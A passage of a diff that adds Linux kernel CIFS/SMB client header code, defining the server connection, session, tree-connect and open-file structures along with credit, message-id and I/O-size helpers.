++	return be32_to_cpu(*((__be32 *)buf)) & 0xffffff;
++}
++
++static inline void
++inc_rfc1001_len(void *buf, int count)
++{
++	be32_add_cpu((__be32 *)buf, count);
++}
++
++struct TCP_Server_Info {
++	struct list_head tcp_ses_list;
++	struct list_head smb_ses_list;
++	spinlock_t srv_lock;  /* protect anything here that is not protected */
++	__u64 conn_id; /* connection identifier (useful for debugging) */
++	int srv_count; /* reference counter */
++	/* 15 character server name + 0x20 16th byte indicating type = srv */
++	char server_RFC1001_name[RFC1001_NAME_LEN_WITH_NULL];
++	struct smb_version_operations	*ops;
++	struct smb_version_values	*vals;
++	/* updates to tcpStatus protected by cifs_tcp_ses_lock */
++	enum statusEnum tcpStatus; /* what we think the status is */
++	char *hostname; /* hostname portion of UNC string */
++	struct socket *ssocket;
++	struct sockaddr_storage dstaddr;
++	struct sockaddr_storage srcaddr; /* locally bind to this IP */
++#ifdef CONFIG_NET_NS
++	struct net *net;
++#endif
++	wait_queue_head_t response_q;
++	wait_queue_head_t request_q; /* if more than maxmpx to srvr must block*/
++	spinlock_t mid_lock;  /* protect mid queue and it's entries */
++	struct list_head pending_mid_q;
++	bool noblocksnd;		/* use blocking sendmsg */
++	bool noautotune;		/* do not autotune send buf sizes */
++	bool nosharesock;
++	bool tcp_nodelay;
++	unsigned int credits;  /* send no more requests at once */
++	unsigned int max_credits; /* can override large 32000 default at mnt */
++	unsigned int in_flight;  /* number of requests on the wire to server */
++	unsigned int max_in_flight; /* max number of requests that were on wire */
++	spinlock_t req_lock;  /* protect the two values above */
++	struct mutex _srv_mutex;
++	unsigned int nofs_flag;
++	struct task_struct *tsk;
++	char server_GUID[16];
++	__u16 sec_mode;
++	bool sign; /* is signing enabled on this connection? */
++	bool ignore_signature:1; /* skip validation of signatures in SMB2/3 rsp */
++	bool session_estab; /* mark when very first sess is established */
++	int echo_credits;  /* echo reserved slots */
++	int oplock_credits;  /* oplock break reserved slots */
++	bool echoes:1; /* enable echoes */
++	__u8 client_guid[SMB2_CLIENT_GUID_SIZE]; /* Client GUID */
++	u16 dialect; /* dialect index that server chose */
++	bool oplocks:1; /* enable oplocks */
++	unsigned int maxReq;	/* Clients should submit no more */
++	/* than maxReq distinct unanswered SMBs to the server when using  */
++	/* multiplexed reads or writes (for SMB1/CIFS only, not SMB2/SMB3) */
++	unsigned int maxBuf;	/* maxBuf specifies the maximum */
++	/* message size the server can send or receive for non-raw SMBs */
++	/* maxBuf is returned by SMB NegotiateProtocol so maxBuf is only 0 */
++	/* when socket is setup (and during reconnect) before NegProt sent */
++	unsigned int max_rw;	/* maxRw specifies the maximum */
++	/* message size the server can send or receive for */
++	/* SMB_COM_WRITE_RAW or SMB_COM_READ_RAW. */
++	unsigned int capabilities; /* selective disabling of caps by smb sess */
++	int timeAdj;  /* Adjust for difference in server time zone in sec */
++	__u64 CurrentMid;         /* multiplex id - rotating counter, protected by GlobalMid_Lock */
++	char cryptkey[CIFS_CRYPTO_KEY_SIZE]; /* used by ntlm, ntlmv2 etc */
++	/* 16th byte of RFC1001 workstation name is always null */
++	char workstation_RFC1001_name[RFC1001_NAME_LEN_WITH_NULL];
++	__u32 sequence_number; /* for signing, protected by srv_mutex */
++	__u32 reconnect_instance; /* incremented on each reconnect */
++	struct session_key session_key;
++	unsigned long lstrp; /* when we got last response from this server */
++	struct cifs_secmech secmech; /* crypto sec mech functs, descriptors */
++#define	CIFS_NEGFLAVOR_UNENCAP	1	/* wct == 17, but no ext_sec */
++#define	CIFS_NEGFLAVOR_EXTENDED	2	/* wct == 17, ext_sec bit set */
++	char	negflavor;	/* NEGOTIATE response flavor */
++	/* extended security flavors that server supports */
++	bool	sec_ntlmssp;		/* supports NTLMSSP */
++	bool	sec_kerberosu2u;	/* supports U2U Kerberos */
++	bool	sec_kerberos;		/* supports plain Kerberos */
++	bool	sec_mskerberos;		/* supports legacy MS Kerberos */
++	bool	large_buf;		/* is current buffer large? */
++	/* use SMBD connection instead of socket */
++	bool	rdma;
++	/* point to the SMBD connection if RDMA is used instead of socket */
++	struct smbd_connection *smbd_conn;
++	struct delayed_work	echo; /* echo ping workqueue job */
++	struct delayed_work	resolve; /* dns resolution workqueue job */
++	char	*smallbuf;	/* pointer to current "small" buffer */
++	char	*bigbuf;	/* pointer to current "big" buffer */
++	/* Total size of this PDU. Only valid from cifs_demultiplex_thread */
++	unsigned int pdu_size;
++	unsigned int total_read; /* total amount of data read in this pass */
++	atomic_t in_send; /* requests trying to send */
++	atomic_t num_waiters;   /* blocked waiting to get in sendrecv */
++#ifdef CONFIG_CIFS_STATS2
++	atomic_t num_cmds[NUMBER_OF_SMB2_COMMANDS]; /* total requests by cmd */
++	atomic_t smb2slowcmd[NUMBER_OF_SMB2_COMMANDS]; /* count resps > 1 sec */
++	__u64 time_per_cmd[NUMBER_OF_SMB2_COMMANDS]; /* total time per cmd */
++	__u32 slowest_cmd[NUMBER_OF_SMB2_COMMANDS];
++	__u32 fastest_cmd[NUMBER_OF_SMB2_COMMANDS];
++#endif /* STATS2 */
++	unsigned int	max_read;
++	unsigned int	max_write;
++	unsigned int	min_offload;
++	__le16	compress_algorithm;
++	__u16	signing_algorithm;
++	__le16	cipher_type;
++	 /* save initital negprot hash */
++	__u8	preauth_sha_hash[SMB2_PREAUTH_HASH_SIZE];
++	bool	signing_negotiated; /* true if valid signing context rcvd from server */
++	bool	posix_ext_supported;
++	struct delayed_work reconnect; /* reconnect workqueue job */
++	struct mutex reconnect_mutex; /* prevent simultaneous reconnects */
++	unsigned long echo_interval;
++
++	/*
++	 * Number of targets available for reconnect. The more targets
++	 * the more tasks have to wait to let the demultiplex thread
++	 * reconnect.
++	 */
++	int nr_targets;
++	bool noblockcnt; /* use non-blocking connect() */
++
++	/*
++	 * If this is a session channel,
++	 * primary_server holds the ref-counted
++	 * pointer to primary channel connection for the session.
++	 */
++#define CIFS_SERVER_IS_CHAN(server)	(!!(server)->primary_server)
++	struct TCP_Server_Info *primary_server;
++
++#ifdef CONFIG_CIFS_SWN_UPCALL
++	bool use_swn_dstaddr;
++	struct sockaddr_storage swn_dstaddr;
++#endif
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	bool is_dfs_conn; /* if a dfs connection */
++	struct mutex refpath_lock; /* protects leaf_fullpath */
++	/*
++	 * Canonical DFS full paths that were used to chase referrals in mount and reconnect.
++	 *
++	 * origin_fullpath: first or original referral path
++	 * leaf_fullpath: last referral path (might be changed due to nested links in reconnect)
++	 *
++	 * current_fullpath: pointer to either origin_fullpath or leaf_fullpath
++	 * NOTE: cannot be accessed outside cifs_reconnect() and smb2_reconnect()
++	 *
++	 * format: \\HOST\SHARE\[OPTIONAL PATH]
++	 */
++	char *origin_fullpath, *leaf_fullpath, *current_fullpath;
++#endif
++};
++
++static inline bool is_smb1(struct TCP_Server_Info *server)
++{
++	return HEADER_PREAMBLE_SIZE(server) != 0;
++}
++
++static inline void cifs_server_lock(struct TCP_Server_Info *server)
++{
++	unsigned int nofs_flag = memalloc_nofs_save();
++
++	mutex_lock(&server->_srv_mutex);
++	server->nofs_flag = nofs_flag;
++}
++
++static inline void cifs_server_unlock(struct TCP_Server_Info *server)
++{
++	unsigned int nofs_flag = server->nofs_flag;
++
++	mutex_unlock(&server->_srv_mutex);
++	memalloc_nofs_restore(nofs_flag);
++}
++
++struct cifs_credits {
++	unsigned int value;
++	unsigned int instance;
++};
++
++static inline unsigned int
++in_flight(struct TCP_Server_Info *server)
++{
++	unsigned int num;
++	spin_lock(&server->req_lock);
++	num = server->in_flight;
++	spin_unlock(&server->req_lock);
++	return num;
++}
++
++static inline bool
++has_credits(struct TCP_Server_Info *server, int *credits, int num_credits)
++{
++	int num;
++	spin_lock(&server->req_lock);
++	num = *credits;
++	spin_unlock(&server->req_lock);
++	return num >= num_credits;
++}
++
++static inline void
++add_credits(struct TCP_Server_Info *server, const struct cifs_credits *credits,
++	    const int optype)
++{
++	server->ops->add_credits(server, credits, optype);
++}
++
++static inline void
++add_credits_and_wake_if(struct TCP_Server_Info *server,
++			const struct cifs_credits *credits, const int optype)
++{
++	if (credits->value) {
++		server->ops->add_credits(server, credits, optype);
++		wake_up(&server->request_q);
++	}
++}
++
++static inline void
++set_credits(struct TCP_Server_Info *server, const int val)
++{
++	server->ops->set_credits(server, val);
++}
++
++static inline int
++adjust_credits(struct TCP_Server_Info *server, struct cifs_credits *credits,
++	       const unsigned int payload_size)
++{
++	return server->ops->adjust_credits ?
++		server->ops->adjust_credits(server, credits, payload_size) : 0;
++}
++
++static inline __le64
++get_next_mid64(struct TCP_Server_Info *server)
++{
++	return cpu_to_le64(server->ops->get_next_mid(server));
++}
++
++static inline __le16
++get_next_mid(struct TCP_Server_Info *server)
++{
++	__u16 mid = server->ops->get_next_mid(server);
++	/*
++	 * The value in the SMB header should be little endian for easy
++	 * on-the-wire decoding.
++	 */
++	return cpu_to_le16(mid);
++}
++
++static inline void
++revert_current_mid(struct TCP_Server_Info *server, const unsigned int val)
++{
++	if (server->ops->revert_current_mid)
++		server->ops->revert_current_mid(server, val);
++}
++
++static inline void
++revert_current_mid_from_hdr(struct TCP_Server_Info *server,
++			    const struct smb2_hdr *shdr)
++{
++	unsigned int num = le16_to_cpu(shdr->CreditCharge);
++
++	return revert_current_mid(server, num > 0 ? num : 1);
++}
++
++static inline __u16
++get_mid(const struct smb_hdr *smb)
++{
++	return le16_to_cpu(smb->Mid);
++}
++
++static inline bool
++compare_mid(__u16 mid, const struct smb_hdr *smb)
++{
++	return mid == le16_to_cpu(smb->Mid);
++}
++
++/*
++ * When the server supports very large reads and writes via POSIX extensions,
++ * we can allow up to 2^24-1, minus the size of a READ/WRITE_AND_X header, not
++ * including the RFC1001 length.
++ *
++ * Note that this might make for "interesting" allocation problems during
++ * writeback however as we have to allocate an array of pointers for the
++ * pages. A 16M write means ~32kb page array with PAGE_SIZE == 4096.
++ *
++ * For reads, there is a similar problem as we need to allocate an array
++ * of kvecs to handle the receive, though that should only need to be done
++ * once.
++ */
++#define CIFS_MAX_WSIZE ((1<<24) - 1 - sizeof(WRITE_REQ) + 4)
++#define CIFS_MAX_RSIZE ((1<<24) - sizeof(READ_RSP) + 4)
++
++/*
++ * When the server doesn't allow large posix writes, only allow a rsize/wsize
++ * of 2^17-1 minus the size of the call header. That allows for a read or
++ * write up to the maximum size described by RFC1002.
++ */
++#define CIFS_MAX_RFC1002_WSIZE ((1<<17) - 1 - sizeof(WRITE_REQ) + 4)
++#define CIFS_MAX_RFC1002_RSIZE ((1<<17) - 1 - sizeof(READ_RSP) + 4)
++
++#define CIFS_DEFAULT_IOSIZE (1024 * 1024)
++
++/*
++ * Windows only supports a max of 60kb reads and 65535 byte writes. Default to
++ * those values when posix extensions aren't in force. In actuality here, we
++ * use 65536 to allow for a write that is a multiple of 4k. Most servers seem
++ * to be ok with the extra byte even though Windows doesn't send writes that
++ * are that large.
++ *
++ * Citation:
++ *
++ * https://blogs.msdn.com/b/openspecification/archive/2009/04/10/smb-maximum-transmit-buffer-size-and-performance-tuning.aspx
++ */
++#define CIFS_DEFAULT_NON_POSIX_RSIZE (60 * 1024)
++#define CIFS_DEFAULT_NON_POSIX_WSIZE (65536)
++
++/*
++ * Macros to allow the TCP_Server_Info->net field and related code to drop out
++ * when CONFIG_NET_NS isn't set.
++ */
++
++#ifdef CONFIG_NET_NS
++
++static inline struct net *cifs_net_ns(struct TCP_Server_Info *srv)
++{
++	return srv->net;
++}
++
++static inline void cifs_set_net_ns(struct TCP_Server_Info *srv, struct net *net)
++{
++	srv->net = net;
++}
++
++#else
++
++static inline struct net *cifs_net_ns(struct TCP_Server_Info *srv)
++{
++	return &init_net;
++}
++
++static inline void cifs_set_net_ns(struct TCP_Server_Info *srv, struct net *net)
++{
++}
++
++#endif
++
++struct cifs_server_iface {
++	struct list_head iface_head;
++	struct kref refcount;
++	size_t speed;
++	unsigned int rdma_capable : 1;
++	unsigned int rss_capable : 1;
++	unsigned int is_active : 1; /* unset if non existent */
++	struct sockaddr_storage sockaddr;
++};
++
++/* release iface when last ref is dropped */
++static inline void
++release_iface(struct kref *ref)
++{
++	struct cifs_server_iface *iface = container_of(ref,
++						       struct cifs_server_iface,
++						       refcount);
++	list_del_init(&iface->iface_head);
++	kfree(iface);
++}
++
++/*
++ * compare two interfaces a and b
++ * return 0 if everything matches.
++ * return 1 if a has higher link speed, or rdma capable, or rss capable
++ * return -1 otherwise.
++ */
++static inline int
++iface_cmp(struct cifs_server_iface *a, struct cifs_server_iface *b)
++{
++	int cmp_ret = 0;
++
++	WARN_ON(!a || !b);
++	if (a->speed == b->speed) {
++		if (a->rdma_capable == b->rdma_capable) {
++			if (a->rss_capable == b->rss_capable) {
++				cmp_ret = memcmp(&a->sockaddr, &b->sockaddr,
++						 sizeof(a->sockaddr));
++				if (!cmp_ret)
++					return 0;
++				else if (cmp_ret > 0)
++					return 1;
++				else
++					return -1;
++			} else if (a->rss_capable > b->rss_capable)
++				return 1;
++			else
++				return -1;
++		} else if (a->rdma_capable > b->rdma_capable)
++			return 1;
++		else
++			return -1;
++	} else if (a->speed > b->speed)
++		return 1;
++	else
++		return -1;
++}
++
++struct cifs_chan {
++	unsigned int in_reconnect : 1; /* if session setup in progress for this channel */
++	struct TCP_Server_Info *server;
++	struct cifs_server_iface *iface; /* interface in use */
++	__u8 signkey[SMB3_SIGN_KEY_SIZE];
++};
++
++/*
++ * Session structure.  One of these for each uid session with a particular host
++ */
++struct cifs_ses {
++	struct list_head smb_ses_list;
++	struct list_head rlist; /* reconnect list */
++	struct list_head tcon_list;
++	struct cifs_tcon *tcon_ipc;
++	spinlock_t ses_lock;  /* protect anything here that is not protected */
++	struct mutex session_mutex;
++	struct TCP_Server_Info *server;	/* pointer to server info */
++	int ses_count;		/* reference counter */
++	enum ses_status_enum ses_status;  /* updates protected by cifs_tcp_ses_lock */
++	unsigned overrideSecFlg;  /* if non-zero override global sec flags */
++	char *serverOS;		/* name of operating system underlying server */
++	char *serverNOS;	/* name of network operating system of server */
++	char *serverDomain;	/* security realm of server */
++	__u64 Suid;		/* remote smb uid  */
++	kuid_t linux_uid;	/* overriding owner of files on the mount */
++	kuid_t cred_uid;	/* owner of credentials */
++	unsigned int capabilities;
++	char ip_addr[INET6_ADDRSTRLEN + 1]; /* Max ipv6 (or v4) addr string len */
++	char *user_name;	/* must not be null except during init of sess
++				   and after mount option parsing we fill it */
++	char *domainName;
++	char *password;
++	char workstation_name[CIFS_MAX_WORKSTATION_LEN];
++	struct session_key auth_key;
++	struct ntlmssp_auth *ntlmssp; /* ciphertext, flags, server challenge */
++	enum securityEnum sectype; /* what security flavor was specified? */
++	bool sign;		/* is signing required? */
++	bool domainAuto:1;
++	__u16 session_flags;
++	__u8 smb3signingkey[SMB3_SIGN_KEY_SIZE];
++	__u8 smb3encryptionkey[SMB3_ENC_DEC_KEY_SIZE];
++	__u8 smb3decryptionkey[SMB3_ENC_DEC_KEY_SIZE];
++	__u8 preauth_sha_hash[SMB2_PREAUTH_HASH_SIZE];
++
++	/*
++	 * Network interfaces available on the server this session is
++	 * connected to.
++	 *
++	 * Other channels can be opened by connecting and binding this
++	 * session to interfaces from this list.
++	 *
++	 * iface_lock should be taken when accessing any of these fields
++	 */
++	spinlock_t iface_lock;
++	/* ========= begin: protected by iface_lock ======== */
++	struct list_head iface_list;
++	size_t iface_count;
++	unsigned long iface_last_update; /* jiffies */
++	/* ========= end: protected by iface_lock ======== */
++
++	spinlock_t chan_lock;
++	/* ========= begin: protected by chan_lock ======== */
++#define CIFS_MAX_CHANNELS 16
++#define CIFS_ALL_CHANNELS_SET(ses)	\
++	((1UL << (ses)->chan_count) - 1)
++#define CIFS_ALL_CHANS_GOOD(ses)		\
++	(!(ses)->chans_need_reconnect)
++#define CIFS_ALL_CHANS_NEED_RECONNECT(ses)	\
++	((ses)->chans_need_reconnect == CIFS_ALL_CHANNELS_SET(ses))
++#define CIFS_SET_ALL_CHANS_NEED_RECONNECT(ses)	\
++	((ses)->chans_need_reconnect = CIFS_ALL_CHANNELS_SET(ses))
++#define CIFS_CHAN_NEEDS_RECONNECT(ses, index)	\
++	test_bit((index), &(ses)->chans_need_reconnect)
++#define CIFS_CHAN_IN_RECONNECT(ses, index)	\
++	((ses)->chans[(index)].in_reconnect)
++
++	struct cifs_chan chans[CIFS_MAX_CHANNELS];
++	size_t chan_count;
++	size_t chan_max;
++	atomic_t chan_seq; /* round robin state */
++
++	/*
++	 * chans_need_reconnect is a bitmap indicating which of the channels
++	 * under this smb session needs to be reconnected.
++	 * If not multichannel session, only one bit will be used.
++	 *
++	 * We will ask for sess and tcon reconnection only if all the
++	 * channels are marked for needing reconnection. This will
++	 * enable the sessions on top to continue to live till any
++	 * of the channels below are active.
++	 */
++	unsigned long chans_need_reconnect;
++	/* ========= end: protected by chan_lock ======== */
++};
++
++static inline bool
++cap_unix(struct cifs_ses *ses)
++{
++	return ses->server->vals->cap_unix & ses->capabilities;
++}
++
++/*
++ * common struct for holding inode info when searching for or updating an
++ * inode with new info
++ */
++
++#define CIFS_FATTR_DFS_REFERRAL		0x1
++#define CIFS_FATTR_DELETE_PENDING	0x2
++#define CIFS_FATTR_NEED_REVAL		0x4
++#define CIFS_FATTR_INO_COLLISION	0x8
++#define CIFS_FATTR_UNKNOWN_NLINK	0x10
++#define CIFS_FATTR_FAKE_ROOT_INO	0x20
++
++struct cifs_fattr {
++	u32		cf_flags;
++	u32		cf_cifsattrs;
++	u64		cf_uniqueid;
++	u64		cf_eof;
++	u64		cf_bytes;
++	u64		cf_createtime;
++	kuid_t		cf_uid;
++	kgid_t		cf_gid;
++	umode_t		cf_mode;
++	dev_t		cf_rdev;
++	unsigned int	cf_nlink;
++	unsigned int	cf_dtype;
++	struct timespec64 cf_atime;
++	struct timespec64 cf_mtime;
++	struct timespec64 cf_ctime;
++	u32             cf_cifstag;
++	char            *cf_symlink_target;
++};
++
++/*
++ * there is one of these for each connection to a resource on a particular
++ * session
++ */
++struct cifs_tcon {
++	struct list_head tcon_list;
++	int tc_count;
++	struct list_head rlist; /* reconnect list */
++	spinlock_t tc_lock;  /* protect anything here that is not protected */
++	atomic_t num_local_opens;  /* num of all opens including disconnected */
++	atomic_t num_remote_opens; /* num of all network opens on server */
++	struct list_head openFileList;
++	spinlock_t open_file_lock; /* protects list above */
++	struct cifs_ses *ses;	/* pointer to session associated with */
++	char tree_name[MAX_TREE_SIZE + 1]; /* UNC name of resource in ASCII */
++	char *nativeFileSystem;
++	char *password;		/* for share-level security */
++	__u32 tid;		/* The 4 byte tree id */
++	__u16 Flags;		/* optional support bits */
++	enum tid_status_enum status;
++	atomic_t num_smbs_sent;
++	union {
++		struct {
++			atomic_t num_writes;
++			atomic_t num_reads;
++			atomic_t num_flushes;
++			atomic_t num_oplock_brks;
++			atomic_t num_opens;
++			atomic_t num_closes;
++			atomic_t num_deletes;
++			atomic_t num_mkdirs;
++			atomic_t num_posixopens;
++			atomic_t num_posixmkdirs;
++			atomic_t num_rmdirs;
++			atomic_t num_renames;
++			atomic_t num_t2renames;
++			atomic_t num_ffirst;
++			atomic_t num_fnext;
++			atomic_t num_fclose;
++			atomic_t num_hardlinks;
++			atomic_t num_symlinks;
++			atomic_t num_locks;
++			atomic_t num_acl_get;
++			atomic_t num_acl_set;
++		} cifs_stats;
++		struct {
++			atomic_t smb2_com_sent[NUMBER_OF_SMB2_COMMANDS];
++			atomic_t smb2_com_failed[NUMBER_OF_SMB2_COMMANDS];
++		} smb2_stats;
++	} stats;
++	__u64    bytes_read;
++	__u64    bytes_written;
++	spinlock_t stat_lock;  /* protects the two fields above */
++	FILE_SYSTEM_DEVICE_INFO fsDevInfo;
++	FILE_SYSTEM_ATTRIBUTE_INFO fsAttrInfo; /* ok if fs name truncated */
++	FILE_SYSTEM_UNIX_INFO fsUnixInfo;
++	bool ipc:1;   /* set if connection to IPC$ share (always also pipe) */
++	bool pipe:1;  /* set if connection to pipe share */
++	bool print:1; /* set if connection to printer share */
++	bool retry:1;
++	bool nocase:1;
++	bool nohandlecache:1; /* if strange server resource prob can turn off */
++	bool nodelete:1;
++	bool seal:1;      /* transport encryption for this mounted share */
++	bool unix_ext:1;  /* if false disable Linux extensions to CIFS protocol
++				for this mount even if server would support */
++	bool posix_extensions; /* if true SMB3.11 posix extensions enabled */
++	bool local_lease:1; /* check leases (only) on local system not remote */
++	bool broken_posix_open; /* e.g. Samba server versions < 3.3.2, 3.2.9 */
++	bool broken_sparse_sup; /* if server or share does not support sparse */
++	bool need_reconnect:1; /* connection reset, tid now invalid */
++	bool need_reopen_files:1; /* need to reopen tcon file handles */
++	bool use_resilient:1; /* use resilient instead of durable handles */
++	bool use_persistent:1; /* use persistent instead of durable handles */
++	bool no_lease:1;    /* Do not request leases on files or directories */
++	bool use_witness:1; /* use witness protocol */
++	__le32 capabilities;
++	__u32 share_flags;
++	__u32 maximal_access;
++	__u32 vol_serial_number;
++	__le64 vol_create_time;
++	__u64 snapshot_time; /* for timewarp tokens - timestamp of snapshot */
++	__u32 handle_timeout; /* persistent and durable handle timeout in ms */
++	__u32 ss_flags;		/* sector size flags */
++	__u32 perf_sector_size; /* best sector size for perf */
++	__u32 max_chunks;
++	__u32 max_bytes_chunk;
++	__u32 max_bytes_copy;
++#ifdef CONFIG_CIFS_FSCACHE
++	u64 resource_id;		/* server resource id */
++	struct fscache_volume *fscache;	/* cookie for share */
++#endif
++	struct list_head pending_opens;	/* list of incomplete opens */
++	struct cached_fids *cfids;
++	/* BB add field for back pointer to sb struct(s)? */
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	struct list_head ulist; /* cache update list */
++#endif
++	struct delayed_work	query_interfaces; /* query interfaces workqueue job */
++};
++
++/*
++ * This is a refcounted and timestamped container for a tcon pointer. The
++ * container holds a tcon reference. It is considered safe to free one of
++ * these when the tl_count goes to 0. The tl_time is the time of the last
++ * "get" on the container.
++ */
++struct tcon_link {
++	struct rb_node		tl_rbnode;
++	kuid_t			tl_uid;
++	unsigned long		tl_flags;
++#define TCON_LINK_MASTER	0
++#define TCON_LINK_PENDING	1
++#define TCON_LINK_IN_TREE	2
++	unsigned long		tl_time;
++	atomic_t		tl_count;
++	struct cifs_tcon	*tl_tcon;
++};
++
++extern struct tcon_link *cifs_sb_tlink(struct cifs_sb_info *cifs_sb);
++extern void smb3_free_compound_rqst(int num_rqst, struct smb_rqst *rqst);
++
++static inline struct cifs_tcon *
++tlink_tcon(struct tcon_link *tlink)
++{
++	return tlink->tl_tcon;
++}
++
++static inline struct tcon_link *
++cifs_sb_master_tlink(struct cifs_sb_info *cifs_sb)
++{
++	return cifs_sb->master_tlink;
++}
++
++extern void cifs_put_tlink(struct tcon_link *tlink);
++
++static inline struct tcon_link *
++cifs_get_tlink(struct tcon_link *tlink)
++{
++	if (tlink && !IS_ERR(tlink))
++		atomic_inc(&tlink->tl_count);
++	return tlink;
++}
++
++/* This function is always expected to succeed */
++extern struct cifs_tcon *cifs_sb_master_tcon(struct cifs_sb_info *cifs_sb);
++
++#define CIFS_OPLOCK_NO_CHANGE 0xfe
++
++struct cifs_pending_open {
++	struct list_head olist;
++	struct tcon_link *tlink;
++	__u8 lease_key[16];
++	__u32 oplock;
++};
++
++struct cifs_deferred_close {
++	struct list_head dlist;
++	struct tcon_link *tlink;
++	__u16  netfid;
++	__u64  persistent_fid;
++	__u64  volatile_fid;
++};
++
++/*
++ * This info hangs off the cifsFileInfo structure, pointed to by llist.
++ * This is used to track byte stream locks on the file
++ */
++struct cifsLockInfo {
++	struct list_head llist;	/* pointer to next cifsLockInfo */
++	struct list_head blist; /* pointer to locks blocked on this */
++	wait_queue_head_t block_q;
++	__u64 offset;
++	__u64 length;
++	__u32 pid;
++	__u16 type;
++	__u16 flags;
++};
++
++/*
++ * One of these for each open instance of a file
++ */
++struct cifs_search_info {
++	loff_t index_of_last_entry;
++	__u16 entries_in_buffer;
++	__u16 info_level;
++	__u32 resume_key;
++	char *ntwrk_buf_start;
++	char *srch_entries_start;
++	char *last_entry;
++	const char *presume_name;
++	unsigned int resume_name_len;
++	bool endOfSearch:1;
++	bool emptyDir:1;
++	bool unicode:1;
++	bool smallBuf:1; /* so we know which buf_release function to call */
++};
++
++#define ACL_NO_MODE	((umode_t)(-1))
++struct cifs_open_parms {
++	struct cifs_tcon *tcon;
++	struct cifs_sb_info *cifs_sb;
++	int disposition;
++	int desired_access;
++	int create_options;
++	const char *path;
++	struct cifs_fid *fid;
++	umode_t mode;
++	bool reconnect:1;
++};
++
++struct cifs_fid {
++	__u16 netfid;
++	__u64 persistent_fid;	/* persist file id for smb2 */
++	__u64 volatile_fid;	/* volatile file id for smb2 */
++	__u8 lease_key[SMB2_LEASE_KEY_SIZE];	/* lease key for smb2 */
++	__u8 create_guid[16];
++	__u32 access;
++	struct cifs_pending_open *pending_open;
++	unsigned int epoch;
++#ifdef CONFIG_CIFS_DEBUG2
++	__u64 mid;
++#endif /* CIFS_DEBUG2 */
++	bool purge_cache;
++};
++
++struct cifs_fid_locks {
++	struct list_head llist;
++	struct cifsFileInfo *cfile;	/* fid that owns locks */
++	struct list_head locks;		/* locks held by fid above */
++};
++
++struct cifsFileInfo {
++	/* following two lists are protected by tcon->open_file_lock */
++	struct list_head tlist;	/* pointer to next fid owned by tcon */
++	struct list_head flist;	/* next fid (file instance) for this inode */
++	/* lock list below protected by cifsi->lock_sem */
++	struct cifs_fid_locks *llist;	/* brlocks held by this fid */
++	kuid_t uid;		/* allows finding which FileInfo structure */
++	__u32 pid;		/* process id who opened file */
++	struct cifs_fid fid;	/* file id from remote */
++	struct list_head rlist; /* reconnect list */
++	/* BB add lock scope info here if needed */ ;
++	/* lock scope id (0 if none) */
++	struct dentry *dentry;
++	struct tcon_link *tlink;
++	unsigned int f_flags;
++	bool invalidHandle:1;	/* file closed via session abend */
++	bool swapfile:1;
++	bool oplock_break_cancelled:1;
++	unsigned int oplock_epoch; /* epoch from the lease break */
++	__u32 oplock_level; /* oplock/lease level from the lease break */
++	int count;
++	spinlock_t file_info_lock; /* protects four flag/count fields above */
++	struct mutex fh_mutex; /* prevents reopen race after dead ses*/
++	struct cifs_search_info srch_inf;
++	struct work_struct oplock_break; /* work for oplock breaks */
++	struct work_struct put; /* work for the final part of _put */
++	struct delayed_work deferred;
++	bool deferred_close_scheduled; /* Flag to indicate close is scheduled */
++	char *symlink_target;
++};
++
++struct cifs_io_parms {
++	__u16 netfid;
++	__u64 persistent_fid;	/* persist file id for smb2 */
++	__u64 volatile_fid;	/* volatile file id for smb2 */
++	__u32 pid;
++	__u64 offset;
++	unsigned int length;
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++};
++
++struct cifs_aio_ctx {
++	struct kref		refcount;
++	struct list_head	list;
++	struct mutex		aio_mutex;
++	struct completion	done;
++	struct iov_iter		iter;
++	struct kiocb		*iocb;
++	struct cifsFileInfo	*cfile;
++	struct bio_vec		*bv;
++	loff_t			pos;
++	unsigned int		npages;
++	ssize_t			rc;
++	unsigned int		len;
++	unsigned int		total_len;
++	bool			should_dirty;
++	/*
++	 * Indicates if this aio_ctx is for direct_io,
++	 * If yes, iter is a copy of the user passed iov_iter
++	 */
++	bool			direct_io;
++};
++
++/* asynchronous read support */
++struct cifs_readdata {
++	struct kref			refcount;
++	struct list_head		list;
++	struct completion		done;
++	struct cifsFileInfo		*cfile;
++	struct address_space		*mapping;
++	struct cifs_aio_ctx		*ctx;
++	__u64				offset;
++	unsigned int			bytes;
++	unsigned int			got_bytes;
++	pid_t				pid;
++	int				result;
++	struct work_struct		work;
++	int (*read_into_pages)(struct TCP_Server_Info *server,
++				struct cifs_readdata *rdata,
++				unsigned int len);
++	int (*copy_into_pages)(struct TCP_Server_Info *server,
++				struct cifs_readdata *rdata,
++				struct iov_iter *iter);
++	struct kvec			iov[2];
++	struct TCP_Server_Info		*server;
++#ifdef CONFIG_CIFS_SMB_DIRECT
++	struct smbd_mr			*mr;
++#endif
++	unsigned int			pagesz;
++	unsigned int			page_offset;
++	unsigned int			tailsz;
++	struct cifs_credits		credits;
++	unsigned int			nr_pages;
++	struct page			**pages;
++};
++
++/* asynchronous write support */
++struct cifs_writedata {
++	struct kref			refcount;
++	struct list_head		list;
++	struct completion		done;
++	enum writeback_sync_modes	sync_mode;
++	struct work_struct		work;
++	struct cifsFileInfo		*cfile;
++	struct cifs_aio_ctx		*ctx;
++	__u64				offset;
++	pid_t				pid;
++	unsigned int			bytes;
++	int				result;
++	struct TCP_Server_Info		*server;
++#ifdef CONFIG_CIFS_SMB_DIRECT
++	struct smbd_mr			*mr;
++#endif
++	unsigned int			pagesz;
++	unsigned int			page_offset;
++	unsigned int			tailsz;
++	struct cifs_credits		credits;
++	unsigned int			nr_pages;
++	struct page			**pages;
++};
++
++/*
++ * Take a reference on the file private data. Must be called with
++ * cfile->file_info_lock held.
++ */
++static inline void
++cifsFileInfo_get_locked(struct cifsFileInfo *cifs_file)
++{
++	++cifs_file->count;
++}
++
++struct cifsFileInfo *cifsFileInfo_get(struct cifsFileInfo *cifs_file);
++void _cifsFileInfo_put(struct cifsFileInfo *cifs_file, bool wait_oplock_hdlr,
++		       bool offload);
++void cifsFileInfo_put(struct cifsFileInfo *cifs_file);
++
++#define CIFS_CACHE_READ_FLG	1
++#define CIFS_CACHE_HANDLE_FLG	2
++#define CIFS_CACHE_RH_FLG	(CIFS_CACHE_READ_FLG | CIFS_CACHE_HANDLE_FLG)
++#define CIFS_CACHE_WRITE_FLG	4
++#define CIFS_CACHE_RW_FLG	(CIFS_CACHE_READ_FLG | CIFS_CACHE_WRITE_FLG)
